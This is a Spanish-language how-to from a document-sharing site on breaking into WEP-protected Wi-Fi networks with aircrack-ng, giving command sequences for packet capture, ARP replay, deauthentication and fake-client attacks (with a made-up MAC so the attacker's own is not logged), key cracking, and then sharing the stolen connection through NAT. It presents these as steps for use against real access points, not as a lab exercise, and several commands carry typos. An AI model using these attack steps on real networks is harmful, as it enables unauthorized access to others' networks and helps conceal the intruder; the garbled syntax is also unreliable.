Wifi Aircrack
Enviado por os7249 • 23 de Abril de 2013 • 351 Palabras (2 Páginas) • 362 Visitas
WIFIs
CARGAR MÓDULO INYECCIÓN
Primero deberemos asegurarnos que nuestra tarjeta wifi tiene un chipset que permite reinyección de tráfico. Cargaremos el módulo de inyección para nuestra tarjeta, si tenemos una Intel Pro/wireless 3945ABG, por ejemplo, nos vamos al menú, wifislax, asistencia para chips, asistencia intel pro wireless, cargar ipw3945 inyección.
Una vez hecho esto tendremos que levantar la tarjeta, para este caso:
ifconfig wifi0 up
Nota: podemos ver que tarjeta tiene nuestro sistema usando el comando lspci, aparecerá una lista con los dispositivos del sistema y alguno con el nombre network controller será la tarjeta wifi.
BÚSQUEDA DE OBJETOS
Escogemos siempre que sea posible un puto de acceso que tengas clientes. Una vez localizado un cliente paramos el comando airodump-ng control+c
Ventana 1: airodump-ng wifi0
ATAQUE DE DESAUTENTIFICACIÓN
En este ataque una vez localizado un cliente conectado al punto de acceso, en MAC_STATION podremos la misma MAC que tiene ese cliente.
Ventana 1: airodump-ng - - ivs -w canalX -c numerocanal wifi0
Ventana2: aireplay-ng -3 –b MAC_BSSID -h MAC_STATION wifi0
Ventana3: aireplay-ng-0 10 –a MAC_BASSID –c MAC_STATION wifi0
ATAQUE DE CLIENTE FALSO
En este ataque la MAC_STATION nos la inventaremos para que no quede registrada la nuestra, por ejemplo, 00:01:02:03:04:08
Ventana 1: airodump-ng - -ivs –w canalX -c numerocanal wifi0
Ventana 2: aireplay-ng -3 –b MAC_BSSID -h MAC_STATION wifi0
Ventana 3: aireplay-ng -1 30 –e “ESSID” -a MAC_BSSID –h MAC_STATION wifi0
CRACKEADO DE CONTRASEÑAS
aircrack-ng -x –s -0 canalX.ivs
En los paramentaros pondremos –h si creemos que la contraseña son solo números y con –n 64, -n 256 podremos fijar la búsqueda de las contraseñas de determinado número de bits.
Ejemplo: si creemos que la contraseña es de 128 y solo lleva números:
aircrack-ng -x –s -h –n 128 -0 canalX.ivs
Podemos poner a buscar contraseñas cuando llevemos como 100.000 paquetes o menos. Lo normal es que una wifi de 64b necesites 250.000 paquetes, para una de 128b unos 1.250.000 paquetes.
COMPARTIR CONEXIÓN
ifconfig eth0 192.168.1.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o wifi0 -j MASQUERADE
CONFIGURAR RED
iface eth0 inet static
address 192.168.0.10
network 192.168.0.0
netmask 255.255.255.0
broadcast 192.168.0.255
gateway 192.168.0.1
pre-up ifconfig eth0 down
...